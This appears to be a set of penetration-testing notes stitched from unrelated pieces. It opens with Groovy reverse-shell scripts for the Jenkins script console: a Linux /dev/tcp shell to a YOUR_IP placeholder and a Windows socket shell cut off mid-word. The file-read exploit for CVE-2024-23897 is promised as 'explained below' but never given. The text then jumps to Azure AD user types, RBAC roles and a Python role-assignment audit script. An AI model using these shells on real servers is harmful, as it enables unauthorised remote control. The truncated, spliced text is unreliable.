Exploiting Jenkins / CVE-2024-23897
Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script
If you don't have access to script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).
Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.
For Linux,
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows,
String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Azure Active Directory has two types of users.
1) Member
A member is a normal cloud user. An Active Directory member can read all directory information and can invite external users. They can also manage their own profile information and can register applications in the AD.
2) Guest
A guest is a restricted user who can manage only their own profile data. A guest cannot browse the directory and cannot register applications in the AD.
RBAC built-in roles (Top 4)
- Owner Role : Lets you manage everything, including access to resources. The owner can add permissions and perform actions such as deleting or stopping resources.
- Contributor Role : This role allows a user to manage all types of resources, but does not allow the user to grant access to resources. To be able to grant access to resources, the user must be assigned either the User Access Administrator Role or the Owner Role.
- User Access Administrator Role : In this role, the user can manage access to resources. The user can read all resources, but cannot modify them.
- Virtual Machine Contributor Role : This role allows a user to manage the properties of the virtual machine. It does not provide access to the underlying virtual network or the storage accounts the virtual machine is connected to.
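The split above (only Owner and User Access Administrator can grant access) gives a simple audit over role assignments. This is an added example, not part of the original notes: it assumes records shaped like the output of `az role assignment list --all -o json`, uses constructed sample data, and treats "#EXT#" in the UPN as a guest marker (a heuristic).

```python
# Roles that, per the list above, can grant access to resources.
CAN_GRANT_ACCESS = {"Owner", "User Access Administrator"}

# Constructed sample (invented names, placeholder subscription ID), using the
# field names found in `az role assignment list --all -o json` output.
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
FIELDS = ("principalName", "principalType", "roleDefinitionName", "scope")
SAMPLE = [dict(zip(FIELDS, row)) for row in [
    ("alice@example.onmicrosoft.com", "User", "Owner", SUB),
    ("bob_partner.example#EXT#@example.onmicrosoft.com", "User",
     "User Access Administrator", SUB + "/resourceGroups/rg-app"),
    ("carol@example.onmicrosoft.com", "User", "Contributor", SUB),
    ("dave@example.onmicrosoft.com", "User", "Virtual Machine Contributor",
     SUB + "/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm1"),
    ("erin@example.onmicrosoft.com", "User", "Owner", SUB + "/resourceGroups/rg-app"),
]]

def scope_level(scope):
    """Classify how broad an assignment scope is."""
    parts = [p.lower() for p in scope.strip("/").split("/") if p]
    if not parts:
        return "root"
    if parts[0] == "providers":
        return "management-group"
    if len(parts) == 2:
        return "subscription"
    if len(parts) == 4 and parts[2] == "resourcegroups":
        return "resource-group"
    return "resource"

def is_guest(a):
    # Assumption: invited guest accounts carry "#EXT#" in their UPN.
    return a.get("principalType") == "User" and "#EXT#" in a.get("principalName", "")

def audit(assignments):
    """Return assignments that can grant access, with a review priority."""
    findings = []
    for a in assignments:
        if a.get("roleDefinitionName") not in CAN_GRANT_ACCESS:
            continue  # Contributor and VM Contributor cannot grant access
        level = scope_level(a.get("scope", ""))
        broad = level in ("root", "management-group", "subscription")
        findings.append({"principal": a["principalName"],
                         "role": a["roleDefinitionName"], "level": level,
                         "guest": is_guest(a),
                         "priority": "high" if broad or is_guest(a) else "review"})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f)
```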